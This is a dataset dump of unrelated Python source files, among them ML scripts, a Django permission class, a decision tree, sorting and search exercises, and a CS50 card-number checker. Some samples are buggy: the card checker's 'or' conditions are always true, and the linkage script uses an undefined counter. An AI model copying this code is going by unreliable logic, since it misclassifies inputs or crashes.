open(path,'wb')\n pickle.dump(obj,outfile)\n outfile.close()\n print(path+\" pickled\")\n\nif use_CUDA==True:\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\n device=\"gpu\"\nelse:\n device=\"cpu\"\n\n\nposterior_path=\"posteriors/posterior{}_{}.pkl\".format(sim_iterations,sim_method)\ntry: \n infile = open(posterior_path,'rb')\n posterior = pickle.load(infile)\n infile.close()\n print(\"Prior Loaded - \"+posterior_path)\n\nexcept FileNotFoundError:\n \n print(posterior_path+\" not found.\\nGenerating posterior\")\n\n start=time.time()\n sim_timer=[]\n \n dist_vals={\"m\": [-100., 100.], #parameter distributions [low, highs]\n \"c\": [-100., 100.]\n }\n \n dist_lows=torch.tensor([float(dist_vals[i][0]) for i in dist_vals])\n dist_highs=torch.tensor([float(dist_vals[i][1]) for i in dist_vals])\n \n prior = utils.BoxUniform(low=dist_lows, high=dist_highs)\n # print(prior.sample())\n \n # sim_counter=-1 # 2 runs occur during setup\n \n def line(m,c=0.):\n x=torch.arange(-100.,100.,0.1)\n return m*x+c\n \n def simulator(parameter_set): #links parameters to simulation data\n # global sim_timer, sim_counter\n \n # sim_counter+=1\n # startx=time.time()\n \n\n m=float(parameter_set[0])\n c=float(parameter_set[1])\n\n # sim_timer.append(time.time()-startx)\n \n if use_CUDA==True:\n get_gpu_memory()\n \n return line(m,c)#parameter_set\n \n \n \n try:\n threads=cpu_count()\n except:\n threads=1\n \n simulator, prior = prepare_for_sbi(simulator, prior) \n \n if sim_method==\"SNPE\":\n inference = SNPE(simulator, prior, density_estimator='mdn', num_workers=threads, device=device)\n elif sim_method==\"SNLE\":\n inference = SNLE(simulator, prior, density_estimator='mdn', num_workers=threads, device=device)\n elif sim_method==\"SNRE\":\n inference = SNRE(simulator, prior, num_workers=threads, device=device)\n \n posterior = inference(num_simulations=sim_iterations, proposal=None)\n\n print(\"\\nTraining Duration = {}s\".format(round(time.time()-start,2)))\n# print(\"Total Simulation Time = {}s\".format(round(sum(sim_timer),2)))\n \n if save_posterior==True:\n pickler(posterior_path,posterior)\n\nif observe==True:\n observation=line(15.2,32.5)\n # print(observation.size())\n # observation=torch.zeros(1440)\n print(observation)\n samples = posterior.sample((10000,), x=observation)#,sample_with_mcmc=True)\n #print(samples)\n # print(\"-----------------------------------------\")\n log_probability = posterior.log_prob(samples, x=observation,norm_posterior=False)\n #print(len(log_probability))\n \n labels=[i for i in dist_vals]\n _ = utils.pairplot(samples, limits=None, fig_size=(6,6), labels=labels)\nprint(\"\\a\")\n\nif shutdown==True:\n time.sleep(60)\n os.system(\"shutdown\") ","sub_path":"line_test/line_inference.py","file_name":"line_inference.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"139803202","text":"# fit_grapher.py\n\nimport re\nimport sys\nimport datetime\nimport gspread\nimport matplotlib.pyplot as plt\nfrom oauth2client.service_account import ServiceAccountCredentials\n\n\ndef graphData(workout, d1, d2):\n\n plt.plot(d1, d2, '-bo')\n \n plt.xlabel(workout)\n plt.ylabel('Weight')\n \n plt.title(workout)\n plt.show()\n\ndef getSheet(sheet_name):\n\n # use creds to create a client to interact with the Google Drive API\n scope = ['https://www.googleapis.com/auth/drive']\n creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)\n client = gspread.authorize(creds)\n\n # Find a workbook by name and open the first sheet\n # Make sure you use the right name here.\n sheet = client.open(sheet_name).sheet1\n\n return sheet\n\ndef getData(sheet, criteria):\n \n crit = re.compile(criteria)\n\n dates = []\n workouts = []\n for c in sheet.findall(crit):\n\n date = sheet.cell(c.row, c.col-1).value\n workout = re.search(criteria + \"\\(\\d{,3},\\s*\\d{1},\\s*\\d{1,2}\\)\", str(c)).group(0)\n \n weight = int(workout[workout.find(\"(\")+1 : workout.find(\",\")])\n dates.append(date)\n workouts.append(weight)\n \n if not dates and not workouts:\n return None\n\n return (dates, workouts)\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) == 1:\n print(\"Error: Arg empty\")\n else:\n sheet = getSheet(\"Fitness Log\")\n data = getData(sheet, sys.argv[1])\n\n if data is not None:\n graphData(sys.argv[1], data[0], data[1])\n else:\n print(\"Error: Exercise \\\"\", sys.argv[1], \"\\\" not found.\" )\n ","sub_path":"fit_grapher.py","file_name":"fit_grapher.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"629666969","text":"import json\nimport os\nimport pickle\n\nimport lmdb\nimport numpy as np\nfrom PIL import Image\n\nfrom ..utils.stream import ItemFeature\nfrom .base_reader import IMIXDataReader\n\n\nclass HatefulMemesReader(IMIXDataReader):\n\n def __init__(self, cfg):\n self.init_default_params(cfg)\n self.image_dir = cfg.image_dir\n self.imsize = cfg.img_size\n splits = cfg.datasets\n if isinstance(splits, str):\n splits = [splits]\n self.splits = splits\n self.mix_features_pathes = {split: cfg['mix_features'][split] for split in self.splits}\n self.mix_annotations_pathes = {split: cfg['mix_annotations'][split] for split in self.splits}\n\n self.idx_split_index = []\n self.annotations = []\n for split, mix_annotations_path in self.mix_annotations_pathes.items():\n annotations_tmp = self._load_jsonl(mix_annotations_path)\n self.annotations.extend(annotations_tmp)\n self.idx_split_index.extend([split] * len(annotations_tmp))\n self.feature_txns = list(\n set(\n list({\n split: lmdb.open(self.mix_features_pathes[split]).begin()\n for split in list(self.mix_features_pathes.keys())\n }.values())))\n\n self.annotations = [\n ann for ann in self.annotations if self.get_featureinfo_from_txns(self.feature_txns, ann['id']) is not None\n ]\n\n def __len__(self):\n return len(self.annotations)\n\n def __getitem__(self, item):\n annotation = self.annotations[item]\n img_name = annotation['img'].split('/')[-1]\n img_id = annotation['id']\n label = annotation['label']\n text = annotation['text']\n img = self.load_image(img_name)\n features_info = self.get_featureinfo_from_txns(self.feature_txns, img_id)\n\n item_dict = {}\n item_dict.update(features_info)\n item_dict.update({\n 'img_name': img_name,\n 'img_id': img_id,\n 'label': label,\n 'text': text,\n 'img': img,\n })\n\n return ItemFeature(item_dict)\n\n def _load_jsonl(self, annotation_path):\n with open(annotation_path, 'r') as f:\n vs = [json.loads(s) for s in f]\n return vs\n\n def get_featureinfo_from_txns(self, txns, key):\n feature_info = None\n key = str(key)\n for txn in txns:\n feature_info = txn.get(key.encode())\n if feature_info is not None:\n break\n return None if feature_info is None else pickle.loads(feature_info)\n\n def load_image(self, img_name):\n return np.array(\n Image.open(os.path.join(self.image_dir, img_name)).convert('RGB').resize((self.imsize, self.imsize)))\n","sub_path":"imix/data/reader/hatefulmemes_reader.py","file_name":"hatefulmemes_reader.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"585142344","text":"import cv2\r\nimport numpy as np\r\nimport re\r\nfrom matplotlib import pyplot as plt\r\nfrom sklearn.neural_network import MLPClassifier\r\n\r\n\r\nlista_archivos = open('img_list_trainer.txt','r')\r\ncontador = 0\r\nfor linea in lista_archivos:\r\n if contador==0:\r\n datos_imagenes = np.load(linea.rstrip())\r\n else:\r\n sample_actual = np.load(linea.rstrip())\r\n datos_imagenes = np.vstack((datos_imagenes,sample_actual))\r\n contador = contador+1\r\nlista_archivos.close()\r\n\r\nnp.savetxt(\"patrones.csv\", datos_imagenes , delimiter=\",\")\r\n\r\nn_samples, n_first_layer = datos_imagenes.shape\r\netiquetas_imagenes = np.zeros((n_samples,))\r\nind = 0\r\nlista_etiquetas = open('img_label_trainer.txt','r')\r\nfor linea in lista_etiquetas:\r\n etiquetas_imagenes[ind] = float(linea.rstrip())\r\n ind = ind+1\r\n\r\nlista_etiquetas.close()\r\n\r\nnp.savetxt(\"etiquetas.csv\", etiquetas_imagenes , delimiter=\",\")\r\n","sub_path":"empaquetizador2.py","file_name":"empaquetizador2.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"106252279","text":"# AMEX 15 digits, starts with 34 or 37\n# VISA 13 & 16 digits, starts with a 4\n# MASTER CARD 16 digits, starts with 51-55\n\nfrom cs50 import get_string\n# get credit card number from user\nwhile True:\n card = get_string(\"Number: \")\n if card.isdigit() == True:\n break\nlength = len(card)\n\n# convert numbers (format: string) into a list if chars\nstr_card = list(card)\n\n# reverse the order\nstr_card.reverse()\n\n# format list of chars into a list of ints\nnumbers = []\nfor i in str_card:\n numbers.append(int(i))\n\n# starting from the second element double every other element\ndigits = []\nfor j in range(1, length, 2):\n digits.append(2 * numbers[j])\n\n# create new list of other digits\ndigits_other = []\nfor k in range(0, length, 2):\n digits_other.append(numbers[k])\n\n# convert list of int into a list of chars\nstr_digits = []\nfor k in digits:\n str_digits.append(str(k))\n\n# covert list of chars into a full string\nstring = ''.join(str_digits)\n\n# calculate checksum\nchecksum = sum(int(l) for l in string) + sum(digits_other)\n\n# if checksum is valid, check lenght and starting numbers to check type and validity\nif checksum % 10 == 0:\n if length == 13 or 16 and card[0] == '4':\n print(\"VISA\")\n elif length == 15 and (card[0] + card[1] == \"34\" or \"37\"):\n print(\"AMEX\")\n elif length == 16 and (card[0] + card[1] == \"51\" or \"52\" or \"53\" or \"54\" or \"55\"):\n print(\"MASTERCARD\")\n else:\n print(\"INVALID\")\n# if check sum is invalid, print invalid\nelse:\n print(\"INVALID\")\n","sub_path":"pset6/credit/credit.py","file_name":"credit.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"277436730","text":"'''\n Create a function named count_first_letter that takes a\n dictionary named names as a parameter. names should be a \n dictionary where the key is a last name and the value \n is a list of first names. \n The function should return a new dictionary where each key \n is the first letter of a last name, and the value is the number \n of people whose last name begins with that letter.\n'''\n\n# Write your count_first_letter function here:\ndef count_first_letter(names):\n dict = {}\n for key in names:\n init = key[0]\n print(init)\n if init in dict:\n dict[init] += len(names[key])\n else:\n dict[init] = len(names[key])\n return dict\n\n# Uncomment these function calls to test your function:\nprint(count_first_letter({\"Stark\": [\"Ned\", \"Robb\", \"Sansa\"], \"Snow\" : [\"Jon\"], \"Lannister\": [\"Jaime\", \"Cersei\", \"Tywin\"]}))\n# should print {\"S\": 4, \"L\": 3}\nprint(count_first_letter({\"Stark\": [\"Ned\", \"Robb\", \"Sansa\"], \"Snow\" : [\"Jon\"], \"Sannister\": [\"Jaime\", \"Cersei\", \"Tywin\"]}))\n# should print {\"S\": 7}","sub_path":"count_first_letter.py","file_name":"count_first_letter.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"280419238","text":"def num_swap(j):\n tmp = numbers[j+1]\n numbers[j+1] = numbers[j]\n numbers[j] = tmp\n\n\ndef sort_list(numbers):\n i = 1\n while i < len(numbers):\n j = 0\n while j <= (len(numbers) - 2):\n if numbers[j] > numbers[j+1]:\n num_swap(j)\n j += 1\n i += 1\n\n\nnumbers = []\nlength = int(input(\"Type in the length of the list: \"))\n\nfor i in range(length):\n numbers.append(int(input(\"Enter a number: \")))\n\nprint(\"Initial order of numbers: \", numbers)\n\nsort_list(numbers)\nprint(\"Sorted order of numbers: \", numbers)\n","sub_path":"Week 1/Algorithmfromflowchart2.py","file_name":"Algorithmfromflowchart2.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"418186972","text":"import numpy as np\n\nclass DecisionTree:\n def __init__(self, max_depth=7,min_size=3):\n self.max_depth = max_depth\n self.min_size = min_size\n\n def fit(self,X,y):\n dataset = np.column_stack([X,y])\n self.tree = self.__build_tree(dataset)\n\n def predict(self,X):\n if len(X.shape) == 1:\n return self.__predict_one(self.tree,X)\n else:\n y_pred = []\n for x in X:\n y_pred.append(self.__predict_one(self.tree,x))\n return y_pred\n\n def print_tree(self, node, depth=0):\n if isinstance(node, dict):\n print('%s[X%d < %.3f]' % ((depth * ' ', (node['index'] + 1), node['value'])))\n self.print_tree(node['left'], depth + 1)\n self.print_tree(node['right'], depth + 1)\n else:\n print('%s[%s]' % ((depth * ' ', node)))\n\n def __gini_index(self,groups,classes):\n n_instanse = float(sum([ len(group) for group in groups ]))\n gini = 0.0\n for group in groups:\n size = float(len(group))\n if size == 0:\n continue\n score = 0.0\n for class_val in classes:\n p = [row[-1] for row in group].count(class_val)/size\n score +=p*p\n gini +=(1.0 - score)*(size/n_instanse)\n return gini\n\n def __test_split(self,index, value, dataset):\n left, rigth = [],[]\n for row in dataset:\n if row[index]= max_depth:\n node['left'], node['right'] = self.__to_terminal(left), self.__to_terminal(right)\n return\n\n if len(left) <= min_size:\n node['left'] =self.__to_terminal(left)\n else:\n node['left'] = self.__get_split(left)\n self.__split(node['left'], depth + 1)\n\n if len(right) <= min_size:\n node['right'] = self.__to_terminal(right)\n else:\n node['right'] = self.__get_split(right)\n self.__split(node['right'], depth + 1)\n\n def __build_tree(self,train):\n root = self.__get_split(train)\n self.__split(root,1)\n return root\n\n\n def __predict_one(self,node,row):\n if row[node['index']] < node['value']:\n if isinstance(node['left'], dict):\n return self.__predict_one(node['left'], row)\n else:\n return node['left']\n else:\n if isinstance(node['right'], dict):\n return self.__predict_one(node['right'], row)\n else:\n return node['right']\n\n\nif __name__ == '__main__':\n dt = DecisionTree()\n\n dataset = np.array([[2.771244718, 1.784783929, 0],\n [1.728571309, 1.169761413, 0],\n [3.678319846, 2.81281357, 0],\n [3.961043357, 2.61995032, 0],\n [2.999208922, 2.209014212, 0],\n [7.497545867, 3.162953546, 1],\n [9.00220326, 3.339047188, 1],\n [7.444542326, 0.476683375, 1],\n [10.12493903, 3.234550982, 1],\n [6.642287351, 3.319983761, 1]])\n tree = dt.fit(dataset[:,:-1],dataset[:,-1])\n #dt.print_tree(tree)\n print(dt.predict(dataset[:,:-1]))","sub_path":"ClassificationAlgorithms_TimeSeriesPredict/modules/decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"199770403","text":"# MIT 6.034 Lab 0: Getting Started\n# Written by Jessica Noss (jmn), Dylan Holmes (dxh), and past 6.034 staff\n\nfrom point_api import Point\n\n# This is a multiple choice question. You answer by replacing\n# the symbol 'None' with a letter, corresponding to your answer.\n\n# What version of Python do we *recommend* (not \"require\") for this course?\n# A. Python v2.3\n# B. Python v2.5, Python v2.6, or Python v2.7\n# C. Python v3.0\n# Fill in your answer in the next line of code (\"A\", \"B\", or \"C\"):\n\nANSWER_1 = \"B\"\n\n\n#### Warm-up: Exponentiation ###################################################\n\ndef cube(x):\n #\"Given a number x, returns its cube (x^3)\"#\n return x**3\n \n ##raise NotImplementedError##\n\n\n#### Recursion #################################################################\n\ndef fibonacci(n):\n #\"Given a positive int n, uses recursion to return the nth Fibonacci number.\"#\n ##raise NotImplementedError##\n if n==0 or n==1:\n return n\n else:\n return fibonacci(n-1)+fibonacci(n-2)\n \n\ndef expression_depth(expr):\n if not isinstance(expr, (list,tuple)):\n return 0\n else:\n return max([expression_depth(sub_expr) for sub_expr in expr])+1\n ##raise NotImplementedError##\n\n\n#### Built-in data types #######################################################\n\ndef compute_string_properties(string):\n \"\"\"Given a string of lowercase letters, returns a tuple containing the\n following three elements:\n 0. The length of the string\n 1. A list of all the characters in the string (including duplicates, if\n any), sorted in REVERSE alphabetical order\n 2. The number of distinct characters in the string (hint: use a set)\n \"\"\"\n \n a = []\n \n thing = []\n for i in string:\n thing.append(i)\n thing = sorted(thing, reverse = True)\n \n thing2 = len(list(set(string)))\n a.append(len(string))\n a.append(thing)\n a.append(thing2)\n a = tuple(a)\n return a\n \n\ndef tally_letters(string):\n \n dic= {}\n for i in string:\n if i not in dic:\n dic[i] = 1\n else:\n dic[i] +=1\n return dic\n \n \n\n\n#### Functions that return functions ###########################################\n\ndef create_multiplier_function(m):\n \"Given a multiplier m, returns a function that multiplies its input by m.\"\n def function(a):\n return a*m\n return function\n\n\n#### Objects and APIs: Copying and modifing objects ##########################\n\ndef get_neighbors(point):\n \"\"\"Given a 2D point (represented as a Point object), returns a list of the\n four points that neighbor it in the four coordinate directions. Uses the\n \"copy\" method to avoid modifying the original point.\"\"\"\n \n return [point.copy().setX(point.getX()+1).setY(point.getY()),point.copy().setX(point.getX()-1).setY(point.getY()),point.copy().setX(point.getX()).setY(point.getY()+1),point.copy().setX(point.getX()).setY(point.getY()-1)]\n \n \n\n\n#### Using the \"key\" argument ##################################################\n\ndef sort_points_by_Y(list_of_points):\n \"\"\"Given a list of 2D points (represented as Point objects), uses \"sorted\"\n with the \"key\" argument to create and return a list of the points sorted in\n increasing order based on their Y coordinates, without modifying the\n original list.\"\"\"\n my_sorting_function = lambda p: p.copy().getY()\n return sorted(list_of_points, key=my_sorting_function)\n \n\ndef furthest_right_point(list_of_points):\n \"\"\"Given a list of 2D points (represented as Point objects), uses \"max\" with\n the \"key\" argument to return the point that is furthest to the right (that\n is, the point with the largest X coordinate).\"\"\"\n my_finding_function = lambda p: p.copy().getX()\n return max(list_of_points, key= my_finding_function)\n\n\n#### SURVEY ####################################################################\n\n# How much programming experience do you have, in any language?\n# A. No experience (never programmed before this semester)\n# B. Beginner (just started learning to program, e.g. took one programming class)\n# C. Intermediate (have written programs for a couple classes/projects)\n# D. Proficient (have been programming for multiple years, or wrote programs for many classes/projects)\n# E. Expert (could teach a class on programming, either in a specific language or in general)\n\nPROGRAMMING_EXPERIENCE = \"C\" #type a letter (A, B, C, D, E) between the quotes\n\n\n# How much experience do you have with Python?\n# A. No experience (never used Python before this semester)\n# B. Beginner (just started learning, e.g. took 6.0001)\n# C. Intermediate (have used Python in a couple classes/projects)\n# D. Proficient (have used Python for multiple years or in many classes/projects)\n# E. Expert (could teach a class on Python)\n\nPYTHON_EXPERIENCE = \"C\"\n\n\n# Finally, the following questions will appear at the end of every lab.\n# The first three are required in order to receive full credit for your lab.\n\nNAME = \"Tugsbayasgalan Manlaibaatar\"\nCOLLABORATORS = \"\"\nHOW_MANY_HOURS_THIS_LAB_TOOK = 1\nSUGGESTIONS = None #optional\n","sub_path":"6.034-2016/lab0/lab0.py","file_name":"lab0.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"458135173","text":"from rest_framework.permissions import DjangoModelPermissions\nfrom rest_framework import exceptions\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nclass LCoreDjangoModelPermissions(DjangoModelPermissions):\n def __init__(self):\n super(LCoreDjangoModelPermissions, self).__init__()\n\n perms_map = {\n # 'GET': ['%(app_label)s.change_%(model_name)s','%(app_label)s.view_%(model_name)s','%(app_label)s.view_self_%(model_name)s'],\n 'GET': ['%(app_label)s.view_%(model_name)s','%(app_label)s.view_self_%(model_name)s'],\n 'OPTIONS': [],\n 'HEAD': [],\n 'POST': ['%(app_label)s.add_%(model_name)s'],\n 'PUT': ['%(app_label)s.change_%(model_name)s','%(app_label)s.change_self_%(model_name)s'],\n 'PATCH': ['%(app_label)s.change_%(model_name)s','%(app_label)s.change_self_%(model_name)s'],\n 'DELETE': ['%(app_label)s.delete_%(model_name)s','%(app_label)s.delete_self_%(model_name)s'],\n }\n\n authenticated_users_only = True\n\n def get_required_permissions(self, method, model_cls):\n \"\"\"\n Given a model and an HTTP method, return the list of permission\n codes that the user is required to have.\n \"\"\"\n kwargs = {\n 'app_label': model_cls._meta.app_label,\n 'model_name': model_cls._meta.model_name\n }\n\n if method not in self.perms_map:\n raise exceptions.MethodNotAllowed(method)\n req_perms = [perm % kwargs for perm in self.perms_map[method]]\n logger.debug('required_permissions: %()s',req_perms)\n return req_perms\n\n def _queryset(self, view):\n assert hasattr(view, 'get_queryset') \\\n or getattr(view, 'queryset', None) is not None, (\n 'Cannot apply {} on a view that does not set '\n '`.queryset` or have a `.get_queryset()` method.'\n ).format(self.__class__.__name__)\n\n if hasattr(view, 'get_queryset'):\n queryset = view.get_queryset()\n assert queryset is not None, (\n '{}.get_queryset() returned None'.format(view.__class__.__name__)\n )\n return queryset\n return view.queryset\n\n def has_perms(self, perm_list, user,obj=None):\n \"\"\"\n Return True if the user has each of the specified permissions. If\n object is passed, check if the user has all required perms for it.\n \"\"\"\n return any(user.has_perm(perm, obj) for perm in perm_list)\n\n def ignore_permission_method(self,request):\n ignore_permission_methods = [key for key,value in self.perms_map.items() if not value]\n if request.method in ignore_permission_methods:\n return True\n\n\n def has_permission(self, request, view):\n # Workaround to ensure DjangoModelPermissions are not applied\n # to the root view when using DefaultRouter.\n if getattr(view, '_ignore_model_permissions', False):\n return True\n\n if not request.user or (\n not request.user.is_authenticated and self.authenticated_users_only):\n return False\n\n if self.ignore_permission_method(request):\n return True\n\n queryset = self._queryset(view)\n perms = self.get_required_permissions(request.method, queryset.model)\n logger.info('requred permissions permissions :%s',perms)\n\n\n return self.has_perms(perms,request.user)\n\n\n\nclass SelfOnlyPermissions(LCoreDjangoModelPermissions):\n perms_map = {\n 'GET': ['%(app_label)s.view_self_%(model_name)s'],\n 'OPTIONS': [],\n 'HEAD': [],\n 'POST': ['%(app_label)s.add_%(model_name)s'],\n 'PUT': ['%(app_label)s.change_self_%(model_name)s'],\n 'PATCH': ['%(app_label)s.change_self_%(model_name)s'],\n 'DELETE': ['%(app_label)s.delete_self_%(model_name)s'],\n }\n def has_perms(self, perm_list, user,obj=None):\n \"\"\"\n Return True if the user has each of the specified permissions. If\n object is passed, check if the user has all required perms for it.\n \"\"\"\n print('SelfOnlyPermissions')\n print(perm_list)\n print(user.get_all_permissions())\n return all(user.has_perm(perm, obj) for perm in perm_list)","sub_path":"apps/l_core/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":4220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"402705406","text":"\ndef search(arr, key):\n left = -1\n right = len(arr)\n while left < right - 1:\n mid = (left + right) // 2\n if arr[mid] < key:\n left = mid\n else:\n right = mid\n if right == len(arr):\n return -1\n if arr[right] == key:\n return right\n else:\n return -1\n\n\ncount = input()\narr = input().split()\nb = input().split()\nfor i in range(len(arr)):\n arr[i] = int(arr[i])\n\nfor i in b:\n i = int(i)\n if i < arr[-1]:\n if search(arr, i) != -1:\n print(\"YES\")\n else:\n print(\"NO\")\n else:\n print(\"NO\")\n\n\n\n","sub_path":"71.py","file_name":"71.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"586242331","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Aug 28 09:40:42 2020\r\n\r\n@author: Grant\r\n\"\"\"\r\n\r\ntraining_data = [[[0, 1]], [[1, 1]], [[2, 2]], [[2, 1]], [[1, 2]], [[5, 5]], [[5, 6]], [[6, 6]], [[6, 7]], [[3, 11]], [[4, 12]], [[3, 12]]]\r\n\r\ndef distance(set_1, set_2):\r\n distance_matrix = []\r\n for s1 in set_1:\r\n for s2 in set_2:\r\n temp = []\r\n d = ((s1[0] - s2[0])**2 + (s1[1] - s2[1])**2)**(1/2)\r\n temp.append(s1)\r\n temp.append(s2)\r\n temp.append(d)\r\n distance_matrix.append(temp)\r\n distance_matrix.sort(key=lambda x: x[2])\r\n return distance_matrix[0][2]\r\n\r\ndendogram = [[0], [1], [2], [3], [4], [5], [6], [7], [8], [9], [10], [11]]\r\n\r\nwhile len(training_data) > 1:\r\n single_linkage_matrix = []\r\n for i in range(len(training_data)):\r\n for j in range(len(training_data)):\r\n if i == j:\r\n continue\r\n \r\n temp = []\r\n d = distance(training_data[i], training_data[j])\r\n temp.append(i)\r\n temp.append(j)\r\n temp.append(d)\r\n \r\n single_linkage_matrix.append(temp)\r\n \r\n single_linkage_matrix.sort(key = lambda x: x[2])\r\n \r\n chosen_point_i = single_linkage_matrix[0][0]\r\n chosen_point_j = single_linkage_matrix[0][1]\r\n \r\n dendogram[chosen_point_i].append(dendogram[chosen_point_j])\r\n dendogram.pop(chosen_point_j)\r\n \r\n for x in range(len(training_data[chosen_point_j])):\r\n element = training_data[chosen_point_j][x]\r\n training_data[chosen_point_i].append(element)\r\n \r\n training_data.pop(chosen_point_j)\r\n n += 1\r\n\r\nprint(dendogram)\r\n \r\n \r\n \r\n \r\n ","sub_path":"Linkage Algorithms.py","file_name":"Linkage Algorithms.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"245382336","text":"import os, sys, json\nfrom django.shortcuts import render, redirect\nfrom django.http.response import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\n\n# db\nfrom accounts.models.user import User\nfrom ShareShogi.models.book import Book\nfrom ShareShogi.models.chapter import Chapter\nfrom ShareShogi.models.scene import Scene\n\n# src\n\n\n@csrf_exempt\ndef get_user_books_request(request):\n\n '''\n 特定のユーザのブック一覧を取得する\n '''\n\n # user_idを取得する\n if request.method == \"GET\":\n user_id = int(request.user.id)\n\n elif request.method == \"POST\":\n payload = json.loads(request.body.decode(\"utf-8\"))\n user_id = int(payload[\"user_id\"])\n\n # bookの情報を取得する\n books = get_books(user_id)\n\n result = {\n \"code\" : 200,\n \"result\": books\n }\n \n return JsonResponse(result)\n\n\ndef get_books(user_id):\n\n '''\n 特定のユーザのブック一覧を取得する\n '''\n\n record_User = User.objects.get(id=user_id)\n queryset_Book = Book.objects.filter(user=record_User)\n\n books = []\n\n for record_Book in queryset_Book:\n\n book_info = get_book_info(book_id=int(record_Book.id))\n books.append(book_info)\n\n books = books[::-1]\n\n return books\n\n\ndef get_book_info(book_id):\n \n '''\n 特定のブックに関する情報を取得する\n \n get_childs : Trueなら、ブックに属する全てのチャプター情報も加える\n '''\n\n record_Book = Book.objects.get(id=book_id)\n\n book_info = {\n \"book_id\" : book_id,\n \"nickname\" : record_Book.user.nickname,\n \"title\" : record_Book.title,\n \"thumb_url\" : record_Book.thumb_url,\n \"is_public\" : record_Book.is_public,\n \"opening_sente\" : record_Book.opening_sente,\n \"opening_gote\" : record_Book.opening_gote,\n }\n\n return book_info","sub_path":"ShareShogi/src/contents/get/get_books.py","file_name":"get_books.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"9870003","text":"\"\"\"\n===========================================\nConvolutional Poisson Gamma Belief Network\n===========================================\n\n\"\"\"\n\n# Author: Jiawen Wu ; Chaojie Wang \n# License: Apache License Version 2.0\n\nimport numpy as np\nfrom pydpm.utils.Metric import *\n\n\n# GPU only\nclass CPGBN(object):\n\n def __init__(self, K, device='gpu'):\n\n self.K = K\n #self.T = self.K.size\n if device == 'gpu':\n self.device = 'gpu'\n from pydpm.utils import Model_Sampler_GPU\n self.Multrnd_Matrix = Model_Sampler_GPU.Multrnd_Matrix_GPU\n self.Crt_Matrix = Model_Sampler_GPU.Crt_Matrix_GPU\n self.Crt_Multirnd_Matrix = Model_Sampler_GPU.Crt_Multirnd_Matrix_GPU\n self.Conv_Multi_Matrix = Model_Sampler_GPU.conv_multi_sample\n else:\n raise Exception('device type error')\n\n\n def initial(self, data ,dtype=\"dense\"):\n\n # data: N*V*L\n if dtype == 'dense':\n self.batch_file_index, self.batch_rows, self.batch_cols = np.where(data)\n self.batch_value = data[self.batch_file_index, self.batch_rows, self.batch_cols]\n N, V, L = data.shape\n elif dtype == 'sparse':\n self.batch_file_index, self.batch_rows, self.batch_cols, self.batch_value = data[0]\n N, V, L = data[1]\n else:\n raise Exception('data type error')\n\n self.batch_len= L\n self.Setting = {}\n self.Setting['N_train'] = N\n # 1-th layer\n self.Setting['K1'] = self.K[0]\n self.Setting['K1_V1'] = V\n self.Setting['K1_V2'] = L + 2 # padding\n self.Setting['K1_S3'] = V\n self.Setting['K1_S4'] = 3\n self.Setting['K1_S1'] = self.Setting['K1_V1'] + 1 - self.Setting['K1_S3']\n self.Setting['K1_S2'] = self.Setting['K1_V2'] + 1 - self.Setting['K1_S4']\n # 2-th layer\n self.Setting['K2'] = self.K[1]\n self.Setting['K2_V1'] = self.Setting['K1_S1']\n self.Setting['K2_V2'] = self.Setting['K1_S2'] + 2 # padding\n self.Setting['K2_S3'] = 1\n self.Setting['K2_S4'] = 3\n self.Setting['K2_S1'] = self.Setting['K2_V1'] + 1 - self.Setting['K2_S3']\n self.Setting['K2_S2'] = self.Setting['K2_V2'] + 1 - self.Setting['K2_S4']\n # 3-th layer\n self.Setting['K3'] = self.K[2]\n self.Setting['K3_V1'] = self.Setting['K2_S1']\n self.Setting['K3_V2'] = self.Setting['K2_S2'] + 2 # padding\n self.Setting['K3_S3'] = 1\n self.Setting['K3_S4'] = 3\n self.Setting['K3_S1'] = self.Setting['K3_V1'] + 1 - self.Setting['K3_S3']\n self.Setting['K3_S2'] = self.Setting['K3_V2'] + 1 - self.Setting['K3_S4']\n\n # ======================= self.SuperParams =======================#\n self.SuperParams = {}\n self.SuperParams['gamma0'] = 0.1 # r\n self.SuperParams['c0'] = 0.1\n self.SuperParams['a0'] = 0.1 # p\n self.SuperParams['b0'] = 0.1\n self.SuperParams['e0'] = 0.1 # c\n self.SuperParams['f0'] = 0.1\n self.SuperParams['eta'] = 0.05 # Phi\n # ======================= self.Params =======================#\n self.Params = {}\n\n # 1-th layer\n self.Params['D1_k1'] = np.random.rand(self.Setting['K1'], self.Setting['K1_S3'], 